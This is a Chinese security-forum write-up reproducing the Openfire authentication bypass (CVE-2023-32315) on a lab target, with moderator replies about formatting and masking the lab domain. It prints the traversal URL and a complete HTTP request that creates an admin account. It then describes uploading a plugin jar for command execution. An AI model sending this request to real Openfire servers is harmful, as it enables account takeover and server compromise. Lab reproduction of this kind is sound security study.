Openfire 身份认证绕过漏洞(CVE-2023-32315) 靶场复现

未曾   ·   发表于 2023-09-04 04:41:24   ·   CTF&WP专版

首先进入靶场访问
https://域名:9090/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp

出现上图所示的日志泄露即可确定漏洞存在
接下来bp抓包,在重发器里填入以下数据包内容:

GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=xxxxx&username=adm123&name=&email=&password=adm123&passwordConfirm=adm123&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7 HTTP/1.1
Host: 域名:9090
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.119 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=xxxxx; csrf=xxxxx
Connection: close


发送出现如图的响应即为成功添加用户,账号密码都为adm123(注:JSESSIONID和csrf可以通过访问登录界面来获取)
登录后台后,去插件那边上传jar包


然后去服务器-服务器设置运行插件,插件密码123回车


然后去找flag就好了
插件下载

用户名金币积分时间理由
Track-魔方 300.00 0 2023-09-06 15:03:13 漏洞复现靶场Write Up征集奖励

打赏我,让我更有动力~

2 条回复   |  直到 2023-9-4 | 663 次浏览

Track-魔方
发表于 2023-9-4

麻烦同学将漏洞POC用代码块包裹起来,并且把格式优化好哈,这样提高可读性,方便他人阅读,奖金池目前还没开放,金币奖励会在奖金池开放之后进行打赏,请同学务必优化一下文章格式提高可读性哈~

评论列表

  • 加载数据中...

编写评论内容

Track-魔方
发表于 2023-9-4

对了,麻烦同学将学院靶场的域名等敏感信息打一下码,做一下脱敏处理,感谢[鲜花]

评论列表

  • 加载数据中...

编写评论内容
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.